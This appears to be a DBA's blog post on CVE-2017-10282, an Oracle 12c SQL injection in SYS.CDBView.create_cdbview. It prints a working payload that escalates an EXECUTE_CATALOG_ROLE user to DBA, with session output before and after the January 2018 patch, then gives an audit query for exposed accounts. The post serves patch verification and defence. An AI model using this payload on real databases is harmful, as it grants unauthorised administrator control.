Since the last quarter of 2016, a very easy-to-exploit SQL injection has been public: with only the combination CREATE SESSION + EXECUTE_CATALOG_ROLE, a user could escalate his privileges to DBA. The first time I read about this flaw was on Mahmoud Hatem's blog.
This SQL injection affects 12.1.0.2 and 12.2.0.1 when the user holds these privileges in CDB$ROOT, or when the database is a non-CDB.
After investigating all the code changes made by the 180116 CPU in the BPs, PSUs, RUs and RURs (for the full list of changes, click on the link in the references), I noticed that Oracle created a subfunction called isLegalOwnerViewName in CDBView that does something similar to DBMS_ASSERT: it validates the owner and view name before they are concatenated into the dynamic SQL.
Checking the list of all CVEs corrected by this update, we can infer that this bug is CVE-2017-10282, created only on 21/June/2017.
Let's try the injection on a 12.2 database, first with the 171017 RU and then with the 180116 RU applied, and compare the results:
On 12.2.0.1 with RU 171017 applied:
WARNING: In this example the view ALL_CUBES will be replaced.

```
[oracle@localhost ~]$ opatch lspatches
26710464;Database Release Update : 12.2.0.1.171017 (26710464)

OPatch succeeded.
[oracle@localhost ~]$ sqlplus / as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Jan 26 09:10:29 2018

Copyright (c) 1982, 2016, Oracle. All rights reserved.

Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> create user c##dbarj identified by oracle;

User created.

SQL> grant create session to c##dbarj;

Grant succeeded.

SQL> grant execute_catalog_role to c##dbarj;

Grant succeeded.

SQL> conn c##dbarj/oracle
Connected.
SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
EXECUTE_CATALOG_ROLE

SQL> -- DON'T RUN IN PRODUCTION --
SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');
BEGIN sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); END;

*
ERROR at line 1:
ORA-00905: missing keyword
ORA-06512: at "SYS.CDBVIEW", line 56
ORA-06512: at line 1

SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES;

X
--------------------------------------------------------------------------------
1

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
DBA
EXECUTE_CATALOG_ROLE

SQL>
```
The SQL injection worked: the grant was executed from inside the view and the user now holds DBA.
And now on 12.2.0.1 with RU 180116 applied:
```
[oracle@localhost ~]$ opatch lspatches
27105253;Database Release Update : 12.2.0.1.180116 (27105253)

OPatch succeeded.
[oracle@localhost ~]$ sqlplus / as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Jan 26 09:20:46 2018

Copyright (c) 1982, 2016, Oracle. All rights reserved.

Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> create user c##dbarj identified by oracle;

User created.

SQL> grant create session to c##dbarj;

Grant succeeded.

SQL> grant execute_catalog_role to c##dbarj;

Grant succeeded.

SQL> conn c##dbarj/oracle
Connected.
SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
EXECUTE_CATALOG_ROLE

SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');
BEGIN sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); END;

*
ERROR at line 1:
ORA-00942: table or view does not exist
ORA-06512: at "SYS.CDBVIEW", line 39
ORA-06512: at line 1

SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES;

no rows selected

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
EXECUTE_CATALOG_ROLE

SQL>
```
The SQL injection no longer works: the view name is rejected before the dynamic SQL is built, ALL_CUBES is not replaced, and the user keeps only EXECUTE_CATALOG_ROLE.
This is yet another reason to always stay on the latest SPU/PSU/BP/RU/RUR, or whatever security fix applies to your release.
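Until the fix is applied, the practical question for a DBA is which accounts actually meet the precondition described above (CREATE SESSION plus EXECUTE_CATALOG_ROLE, directly or through nested roles) and whether the 180116 update is installed. The audit query below is an added example, not part of the original post; it assumes it is run as SYSDBA in CDB$ROOT (or in a non-CDB), and it relies only on the standard DBA_ROLE_PRIVS, DBA_SYS_PRIVS, DBA_USERS and DBA_REGISTRY_SQLPATCH views.

```sql
-- Added audit query (not from the original post). Run as SYSDBA in CDB$ROOT
-- or in a non-CDB: lists accounts that hold the precondition for
-- CVE-2017-10282, i.e. EXECUTE_CATALOG_ROLE plus CREATE SESSION, whether the
-- grant is direct or reached through any depth of role nesting.
WITH role_tree (grantee, role_name) AS (
  -- roles granted directly to database users
  SELECT rp.grantee, rp.granted_role
  FROM   dba_role_privs rp
  WHERE  rp.grantee IN (SELECT username FROM dba_users)
  UNION ALL
  -- roles granted to roles already reached (Oracle forbids circular
  -- role grants, so the recursion terminates)
  SELECT rt.grantee, rp.granted_role
  FROM   role_tree rt
  JOIN   dba_role_privs rp ON rp.grantee = rt.role_name
),
has_create_session (grantee) AS (
  -- CREATE SESSION held directly ...
  SELECT grantee FROM dba_sys_privs WHERE privilege = 'CREATE SESSION'
  UNION
  -- ... or through one of the roles in the tree
  SELECT rt.grantee
  FROM   role_tree rt
  JOIN   dba_sys_privs sp ON sp.grantee = rt.role_name
  WHERE  sp.privilege = 'CREATE SESSION'
)
SELECT DISTINCT u.username, u.account_status
FROM   dba_users u
WHERE  u.username IN (SELECT grantee FROM role_tree
                      WHERE role_name = 'EXECUTE_CATALOG_ROLE')
AND    u.username IN (SELECT grantee FROM has_create_session)
-- accounts that are already DBA have nothing to escalate to
AND    u.username NOT IN (SELECT grantee FROM role_tree WHERE role_name = 'DBA')
ORDER  BY u.username;

-- Second check: is the January 2018 update (180116) recorded in the
-- SQL patch registry? No rows here means the isLegalOwnerViewName fix
-- is not installed and the accounts listed above remain exposed.
SELECT patch_id, action, status, description, action_time
FROM   dba_registry_sqlpatch
WHERE  description LIKE '%180116%'
ORDER  BY action_time;
```

Any account returned by the first query that is not meant to administer the database should lose EXECUTE_CATALOG_ROLE until the update is applied; re-run both queries after patching to confirm the registry row shows STATUS = 'SUCCESS'.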
References:
- https://www.dbarj.com.br/en/2018/01/dissecting-180116-bp-psu-ru-rur/
- https://mahmoudhatem.wordpress.com/2016/12/14/sql-injection-vulnerability-cdbview-package/
- http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixDB
Did you enjoy this post? Please leave a comment or give it a 👍!